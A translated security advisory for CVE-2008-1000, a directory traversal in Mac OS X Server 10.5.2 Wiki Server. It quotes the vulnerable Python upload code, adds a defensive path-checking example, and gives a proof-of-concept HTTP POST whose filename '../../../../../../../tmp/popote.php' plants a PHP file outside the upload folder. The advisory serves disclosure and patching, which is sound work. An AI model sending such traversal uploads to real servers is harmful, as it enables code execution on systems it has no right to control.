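Apple Mac OS X Server Wiki Server Directory Traversal Vulnerability

Published: 2008-03-17
Updated: 2008-03-19

Affected systems:
Apple MacOS X Server 10.5.2
Description:
BUGTRAQ  ID: 28278
CVE(CAN) ID: CVE-2008-1000

Mac OS X Server, also known as Leopard Server, is a server product released by Apple that integrates a range of functions.

Wiki Server, the Python web server enabled by default in MacOS X Server, is affected by a directory traversal attack; a remote attacker could exploit this vulnerability to take control of the server.

A user who can edit wiki content can upload a file that replaces content writable by the wiki server, leading to arbitrary code execution with the privileges of the wiki server. The vulnerable code segment in /usr/share/wikid/lib/python/apple_wlt/ContentServer.py is shown below: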

/-----------

def uploadFileCallback(self, result):
    filename, filetype, aFile = result[1][self.type][0]
    filename = filename.decode('utf-8')
    # IE sends the whole path, including your local username.
    # Only '\\' is treated as a separator here; '/' and '..' components in the
    # client-supplied name are kept and reach os.path.join() below.
    filename = filename.split('\\')[-1]
    extension = filename.split('.')[-1]
    oldFilename = filename
    uploadType = os.path.split(self.fullpath)[-1]
    if uploadType == "images":
        filename = SettingsManager.findGoodName() + '.' + extension
    logging.debug("beginning file upload: %s" % filename)
    isImage = filenameIsImage(filename)
    newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath,
        filename), isImage = (not uploadType == 'attachments'))
    newFilename = os.path.basename(newPath)
    if uploadType == "attachments":
        newParentFolder = os.path.dirname(newPath)
        os.mkdir(newParentFolder)
        newFilename = os.path.join(os.path.basename(newParentFolder), filename)
    [...]

-----------/
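
The following is an added example, not code from Apple's patch or from the original advisory: one way an upload handler can confine a client-supplied name to its upload directory. The names `safe_upload_path`, `UnsafeFilename` and `demo` are hypothetical, the sample inputs are constructed, and reducing the name to its last component (rather than rejecting it outright) is a design choice assumed here.

```python
import os
import tempfile

class UnsafeFilename(ValueError):
    """Raised when a client-supplied upload name cannot be used safely."""

def safe_upload_path(upload_dir, client_filename):
    """Return a path inside upload_dir for client_filename, or raise.

    Hypothetical helper for illustration; not part of Wiki Server.
    """
    # Treat both separators as path separators. The vulnerable snippet split
    # only on '\\', so 'a/../../x' went to os.path.join() unchanged.
    name = client_filename.replace('\\', '/').split('/')[-1]
    # Reject empty names, relative references and embedded NUL bytes.
    if name in ('', '.', '..') or '\x00' in name:
        raise UnsafeFilename(client_filename)
    base = os.path.realpath(upload_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # Defence in depth: the resolved path must still be under the upload
    # directory (this also catches a symlink planted inside it).
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeFilename(client_filename)
    return candidate

def demo():
    """Run constructed sample names through the check; return the results."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        upload_dir = os.path.join(root, 'attachments')
        os.mkdir(upload_dir)
        samples = [  # constructed inputs
            'report.pdf',
            'C:\\Users\\alice\\report.pdf',          # IE-style full path
            '../../../../../../../tmp/popote.php',   # name used in the request on this page
            '..',
        ]
        for s in samples:
            try:
                path = safe_upload_path(upload_dir, s)
                results[s] = os.path.relpath(path, os.path.realpath(upload_dir))
            except UnsafeFilename:
                results[s] = None
    return results

if __name__ == '__main__':
    for name, outcome in demo().items():
        print(repr(name), '->', outcome)
```
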

<*Source: Rodrigo Carvalho
  
  Links: http://marc.info/?l=bugtraq&m=120587279702580&w=2
        http://docs.info.apple.com/article.html?artnum=307562
        http://secunia.com/advisories/29420/
*>

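Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!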

/-----------

POST http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments HTTP/1.0
User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13
Host: 192.168.xxx.xxx
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language:
en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: identity, *;q=0
Referer: http://192.168.xxx.xxx/users/guest/weblog/3f081/
Cookie: cookies=1; acl_cache=3; recentTags=add tags here;
SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6;
sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904
Cookie2: $Version=1
Proxy-Connection: close
Content-length: 426
Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21

- ------------YN7xkbcuNgNx21psG30p21

Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"

Content-Type: application/octet-stream



<? phphinfo(); ?>


  ------------YN7xkbcuNgNx21psG30p21

  Content-Disposition: form-data; name="ok_button"



  Attach

  ------------YN7xkbcuNgNx21psG30p21

  Content-Disposition: form-data; name="upload_id"



  57904

  ------------YN7xkbcuNgNx21psG30p21--

-----------/

Recommendation:
Vendor patch:

Apple
-----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:

http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=18157&cat=57&platform=osx&method=sa/SecUpd2008-002.dmg

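This vulnerability entry was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.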